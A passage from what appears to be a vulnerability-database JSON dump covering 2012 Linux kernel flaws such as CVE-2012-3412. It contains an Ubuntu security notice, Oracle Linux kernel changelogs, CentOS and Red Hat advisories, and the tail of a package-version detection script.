the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-1209-omap4\", ver:\"2.6.38-1209.26\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1567-1\r\nSeptember 14, 2012\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.04\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nA flaw was found in how the Linux kernel passed the replacement session\r\nkeyring to a child process. An unprivileged local user could exploit this\r\nflaw to cause a denial of service (panic). (CVE-2012-2745)\r\n\r\nBen Hutchings reported a flaw in the Linux kernel with some network drivers\r\nthat support TSO (TCP segment offload). A local or peer user could exploit\r\nthis flaw to to cause a denial of service. (CVE-2012-3412)\r\n\r\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\r\nimplementation of RDS sockets. A local unprivileged user could potentially\r\nuse this flaw to read privileged information from the kernel.\r\n(CVE-2012-3430)\r\n\r\nA flaw was discovered in the madvise feature of the Linux kernel's memory\r\nsubsystem. An unprivileged local use could exploit the flaw to cause a\r\ndenial of service (crash the system). (CVE-2012-3511)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.04:\r\n linux-image-2.6.38-16-generic 2.6.38-16.67\r\n linux-image-2.6.38-16-generic-pae 2.6.38-16.67\r\n linux-image-2.6.38-16-omap 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc-smp 2.6.38-16.67\r\n linux-image-2.6.38-16-powerpc64-smp 2.6.38-16.67\r\n linux-image-2.6.38-16-server 2.6.38-16.67\r\n linux-image-2.6.38-16-versatile 2.6.38-16.67\r\n linux-image-2.6.38-16-virtual 2.6.38-16.67\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1567-1\r\n CVE-2012-2745, CVE-2012-3412, CVE-2012-3430, CVE-2012-3511\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/2.6.38-16.67\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "modified": "2012-09-18T00:00:00", "published": "2012-09-18T00:00:00", "id": "SECURITYVULNS:DOC:28560", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28560", "title": "[USN-1567-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:16", "bulletinFamily": "unix", "description": "kernel\n[2.6.18-308.16.1.0.1.el5]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printks when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.16.1.el5]\n- Revert: [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- Revert: [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- Revert: [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n[2.6.18-308.15.1.el5]\n- [net] sfc: Fix max no of TSO segments and min TX queue size (Michal Schmidt) [845554 845555] {CVE-2012-3412}\n- [kernel] xacct_add_tsk: fix pure theoretical ->mm use-after-free (Nikola Pajkovsky) [849723 849725] {CVE-2012-3510}\n- [fs] hfsplus: Buffer overflow in the HFS plus filesystem (Jacob Tanenbaum) [820255 820256] {CVE-2012-2319}\n- [net] netfilter: add dscp netfilter match (Thomas Graf) [847327 842029]\n- [net] rds: set correct msg_namelen (Weiping Pan) [822727 822728] {CVE-2012-3430}\n- [misc] ERESTARTNOINTR seen from fork call in userspace (Oleg Nesterov) [847359 693822]\n- [fs] quota: manage reserved space when quota is not active (Eric Sandeen) [847326 818087]\n- [fs] quota: Fix warning if delayed write before quota is enabled (Eric Sandeen) [847326 818087]\n- [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n- [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- [xen] x86: whitelist Enhanced SpeedStep for dom0 (Laszlo Ersek) [846125 809103]\n[2.6.18-308.14.1.el5]\n- [net] e1000e: drop check of RXCW.CW to eliminate link up and down (Dean Nelson) [852448 840642]", "modified": "2012-10-02T00:00:00", "published": "2012-10-02T00:00:00", "id": "ELSA-2012-1323-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1323-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:07", "bulletinFamily": "unix", "description": "[2.6.32-300.37.1.]\r\n- sfc: Replace some literal constants with EFX_PAGE_SIZE/EFX_BUF_SIZE (Ben Hutchings) [Orabug: 14769994]\r\n- CVE-2012-3412 sfc: Fix maximum number of TSO segments and minimum TX queue size (Ben Hutchings) [Orabug: 14769994] {CVE-2012-3412}\r\n \n[2.6.32-300.36.1.]\r\n- dl2k: Clean up rio_ioctl (Stephan Mueller) [Orabug: 14675306] {CVE-2012-2313}\r\n- hugetlb: fix resv_map leak in error path (Christoph Lameter) [Orabug: 14676403] {CVE-2012-2390}\r\n- rds: set correct msg_namelen (Jay Fenlason) [Orabug: 14676504] {CVE-2012-3430}\r\n \n[2.6.32-300.35.1.]\r\n- oracleasm: Bring driver in sync with UEK2 (Martin K. Petersen)\r\n- Fix system hang due to bad protection module parameters (CR 130769) (Martin\r\n K. Petersen)\r\n- sd: Avoid remapping bad reference tags (Martin K. Petersen)\r\n- block: Fix bad range check in bio_sector_offset (Martin K. Petersen)\r\n \n[2.6.32-300.34.1.]\r\n- htrimer: fix kabi breakage (Joe Jin)\r\n- 2.6.32.x: timekeeping: Add missing update call in timekeeping_resume()\r\n (Thomas Gleixner)\r\n- 2.6.32.x: hrtimer: Update hrtimer base offsets each hrtimer_interrupt (John\r\n Stultz)\r\n- 2.6.32.x: timekeeping: Provide hrtimer update function (Thomas Gleixner)\r\n- 2.6.32.x: hrtimers: Move lock held region in hrtimer_interrupt() (Thomas\r\n Gleixner)\r\n- 2.6.32.x: timekeeping: Maintain ktime_t based offsets for hrtimers (Thomas\r\n Gleixner)\r\n- 2.6.32.x: timekeeping: Fix leapsecond triggered load spike issue (John\r\n Stultz)\r\n- 2.6.32.x: hrtimer: Provide clock_was_set_delayed() (John Stultz)\r\n- 2.6.32.x: time: Move common updates to a function (Thomas Gleixner)\r\n- 2.6.32.x: timekeeping: Fix CLOCK_MONOTONIC inconsistency during leapsecond\r\n (John Stultz)\r\n- 2.6.32.x: ntp: Correct TAI offset during leap second (Richard Cochran)\r\n- 2.6.32.x: ntp: Fix leap-second hrtimer livelock (John Stultz)\r\n- Revert '2.6.32.x: hrtimer: Fix clock_was_set so it is safe to call from irq\r\n context' (Joe Jin)\r\n- Revert '2.6.32.x: time: Fix leapsecond triggered hrtimer/futex load spike\r\n issue' (Joe Jin)\r\n- Revert '2.6.32.x: hrtimer: Update hrtimer base offsets each\r\n hrtimer_interrupt' (Joe Jin)\r\n \n[2.6.32-300.33.1.]\r\n- mpt2sas: Update mpt2sas to 120.105.11.00 (Guru Anbalagane) [Orabug: 14376481]\r\n- Revert 'mpt2sas: update to 12.105.11.00' (Maxim Uvarov)\r", "modified": "2012-10-18T00:00:00", "published": "2012-10-18T00:00:00", "id": "ELSA-2012-2038", "href": "http://linux.oracle.com/errata/ELSA-2012-2038.html", "title": "Unbreakable Enterprise kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:43:14", "bulletinFamily": "unix", "description": "kernel\n[2.6.18-308.16.1.el5]\n- Revert: [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- Revert: [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- Revert: [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n[2.6.18-308.15.1.el5]\n- [net] sfc: Fix max no of TSO segments and min TX queue size (Michal Schmidt) [845554 845555] {CVE-2012-3412}\n- [kernel] xacct_add_tsk: fix pure theoretical ->mm use-after-free (Nikola Pajkovsky) [849723 849725] {CVE-2012-3510}\n- [fs] hfsplus: Buffer overflow in the HFS plus filesystem (Jacob Tanenbaum) [820255 820256] {CVE-2012-2319}\n- [net] netfilter: add dscp netfilter match (Thomas Graf) [847327 842029]\n- [net] rds: set correct msg_namelen (Weiping Pan) [822727 822728] {CVE-2012-3430}\n- [misc] ERESTARTNOINTR seen from fork call in userspace (Oleg Nesterov) [847359 693822]\n- [fs] quota: manage reserved space when quota is not active (Eric Sandeen) [847326 818087]\n- [fs] quota: Fix warning if delayed write before quota is enabled (Eric Sandeen) [847326 818087]\n- [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n- [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- [xen] x86: whitelist Enhanced SpeedStep for dom0 (Laszlo Ersek) [846125 809103]\n[2.6.18-308.14.1.el5]\n- [net] e1000e: drop check of RXCW.CW to eliminate link up and down (Dean Nelson) [852448 840642]", "modified": "2012-10-02T00:00:00", "published": "2012-10-02T00:00:00", "id": "ELSA-2012-1323", "href": "http://linux.oracle.com/errata/ELSA-2012-1323.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:09", "bulletinFamily": "unix", "description": "[2.6.32-300.38.1]\r\n- [net/sfc] limit number of segments per skb on tx (Maxim Uvarov) [Orabug:\r\n 14769994] {CVE-2012-3412}", "modified": "2012-10-19T00:00:00", "published": "2012-10-19T00:00:00", "id": "ELSA-2012-2041", "href": "http://linux.oracle.com/errata/ELSA-2012-2041.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:42:47", "bulletinFamily": "unix", "description": "[2.6.39-200.34.1]\r\n- [net/sfc] limit number of segments per skb on tx (Maxim Uvarov) [Orabug:\r\n 14769994] {CVE-2012-3412}", "modified": "2012-10-19T00:00:00", "published": "2012-10-19T00:00:00", "id": "ELSA-2012-2040", "href": "http://linux.oracle.com/errata/ELSA-2012-2040.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:38:14", "bulletinFamily": "unix", "description": "[2.6.39-200.33.1]\r\n- sfc: Replace some literal constants with EFX_PAGE_SIZE/EFX_BUF_SIZE (Ben Hutchings) [Orabug: 14769994]\r\n- CVE-2012-3412 sfc: Fix maximum number of TSO segments and minimum TX queue size (Ben Hutchings) [Orabug: 14769994] {CVE-2012-3412}", "modified": "2012-10-18T00:00:00", "published": "2012-10-18T00:00:00", "id": "ELSA-2012-2039", "href": "http://linux.oracle.com/errata/ELSA-2012-2039.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:17", "bulletinFamily": "unix", "description": "[2.6.32-279.11.1.el6]\n- [net] core: Fix napi_gro_frags vs netpoll path (Amerigo Wang) [857854 845347]\n- [netdrv] benet: disable BH in callers of be_process_mcc() (Amerigo Wang) [857854 845347]\n- [net] bonding: remove IFF_IN_NETPOLL flag (Amerigo Wang) [857854 845347]\n- [mm] fix contig_page_data kABI breakage and related memory corruption (Satoru Moriya) [857012 853007]\n- [net] sctp: backport sctp cache ipv6 source after route lookup (Michele Baldessari) [858284 855759]\n- [net] sctp: backport support of sctp multi-homing ipv6 source address selection (Michele Baldessari) [858284 855759]\n- [net] ipv6: backport RTA_PREFSRC ipv6 source route selection support (Michele Baldessari) [858285 851118]\n- [netdrv] sfc: Fix maximum number of TSO segments and minimum TX queue size (Nikolay Aleksandrov) [845556 845557] {CVE-2012-3412}\n- [s390] zfcp: No automatic port_rescan on events (Hendrik Brueckner) [856316 855131]\n- [fs] xfs: push the AIL from memory reclaim and periodic sync (Dave Chinner) [856686 855139]\n[2.6.32-279.10.1.el6]\n- [mm] hugetlbfs: close race during teardown of hugetlbfs shared page tables (Rafael Aquini) [857334 856325]\n- [mm] hugetlbfs: Correctly detect if page tables have just been shared (Rafael Aquini) [857334 856325]\n- [kernel] sched: fix divide by zero at {thread_group,task}_times (Stanislaw Gruszka) [856703 843771]", "modified": "2012-10-16T00:00:00", "published": "2012-10-16T00:00:00", "id": "ELSA-2012-1366", "href": "http://linux.oracle.com/errata/ELSA-2012-1366.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:33", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:1323\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\n* A use-after-free flaw was found in the xacct_add_tsk() function in the\nLinux kernel's taskstats subsystem. A local, unprivileged user could use\nthis flaw to cause an information leak or a denial of service.\n(CVE-2012-3510, Moderate)\n\n* A buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS Plus (HFS+) file system implementation in the Linux kernel. A local\nuser able to mount a specially-crafted HFS+ file system image could use\nthis flaw to cause a denial of service or escalate their privileges.\n(CVE-2012-2319, Low)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412, and Alexander Peslyak for reporting CVE-2012-3510. The\nCVE-2012-3430 issue was discovered by the Red Hat InfiniBand team.\n\nThis update also fixes the following bugs:\n\n* The cpuid_whitelist() function, masking the Enhanced Intel SpeedStep\n(EST) flag from all guests, prevented the \"cpuspeed\" service from working\nin the privileged Xen domain (dom0). CPU scaling was therefore not\npossible. With this update, cpuid_whitelist() is aware whether the domain\nexecuting CPUID is privileged or not, and enables the EST flag for dom0.\n(BZ#846125)\n\n* If a delayed-allocation write was performed before quota was enabled,\nthe kernel displayed the following warning message:\n\n WARNING: at fs/quota/dquot.c:988 dquot_claim_space+0x77/0x112()\n\nThis was because information about the delayed allocation was not recorded\nin the quota structure. With this update, writes prior to enabling quota\nare properly accounted for, and the message is not displayed. (BZ#847326)\n\n* In Red Hat Enterprise Linux 5.9, the DSCP (Differentiated Services Code\nPoint) netfilter module now supports mangling of the DSCP field.\n(BZ#847327)\n\n* Some subsystems clear the TIF_SIGPENDING flag during error handling in\nfork() paths. Previously, if the flag was cleared, the ERESTARTNOINTR error\ncode could be returned. The underlying source code has been modified so\nthat the error code is no longer returned. (BZ#847359)\n\n* An unnecessary check for the RXCW.CW bit could cause the Intel e1000e NIC\n(Network Interface Controller) to not work properly. The check has been\nremoved so that the Intel e1000e NIC works as expected. (BZ#852448)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-October/018911.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1323.html", "modified": "2012-10-03T07:39:10", "published": "2012-10-03T07:39:10", "href": "http://lists.centos.org/pipermail/centos-announce/2012-October/018911.html", "id": "CESA-2012:1323", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:16", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:1366\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nthis issue.\n\nThis update also fixes several bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct this issue, and fix the bugs noted in the Technical\nNotes. The system must be rebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-October/018944.html\n\n**Affected packages:**\nkernel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-1366.html", "modified": "2012-10-16T17:34:31", "published": "2012-10-16T17:34:31", "href": "http://lists.centos.org/pipermail/centos-announce/2012-October/018944.html", "id": "CESA-2012:1366", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:42:31", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\n* A use-after-free flaw was found in the xacct_add_tsk() function in the\nLinux kernel's taskstats subsystem. A local, unprivileged user could use\nthis flaw to cause an information leak or a denial of service.\n(CVE-2012-3510, Moderate)\n\n* A buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS Plus (HFS+) file system implementation in the Linux kernel. A local\nuser able to mount a specially-crafted HFS+ file system image could use\nthis flaw to cause a denial of service or escalate their privileges.\n(CVE-2012-2319, Low)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412, and Alexander Peslyak for reporting CVE-2012-3510. The\nCVE-2012-3430 issue was discovered by the Red Hat InfiniBand team.\n\nThis update also fixes the following bugs:\n\n* The cpuid_whitelist() function, masking the Enhanced Intel SpeedStep\n(EST) flag from all guests, prevented the \"cpuspeed\" service from working\nin the privileged Xen domain (dom0). CPU scaling was therefore not\npossible. With this update, cpuid_whitelist() is aware whether the domain\nexecuting CPUID is privileged or not, and enables the EST flag for dom0.\n(BZ#846125)\n\n* If a delayed-allocation write was performed before quota was enabled,\nthe kernel displayed the following warning message:\n\n WARNING: at fs/quota/dquot.c:988 dquot_claim_space+0x77/0x112()\n\nThis was because information about the delayed allocation was not recorded\nin the quota structure. With this update, writes prior to enabling quota\nare properly accounted for, and the message is not displayed. (BZ#847326)\n\n* In Red Hat Enterprise Linux 5.9, the DSCP (Differentiated Services Code\nPoint) netfilter module now supports mangling of the DSCP field.\n(BZ#847327)\n\n* Some subsystems clear the TIF_SIGPENDING flag during error handling in\nfork() paths. Previously, if the flag was cleared, the ERESTARTNOINTR error\ncode could be returned. The underlying source code has been modified so\nthat the error code is no longer returned. (BZ#847359)\n\n* An unnecessary check for the RXCW.CW bit could cause the Intel e1000e NIC\n(Network Interface Controller) to not work properly. The check has been\nremoved so that the Intel e1000e NIC works as expected. (BZ#852448)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T12:19:50", "published": "2012-10-02T04:00:00", "id": "RHSA-2012:1323", "href": "https://access.redhat.com/errata/RHSA-2012:1323", "type": "redhat", "title": "(RHSA-2012:1323) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:23", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the 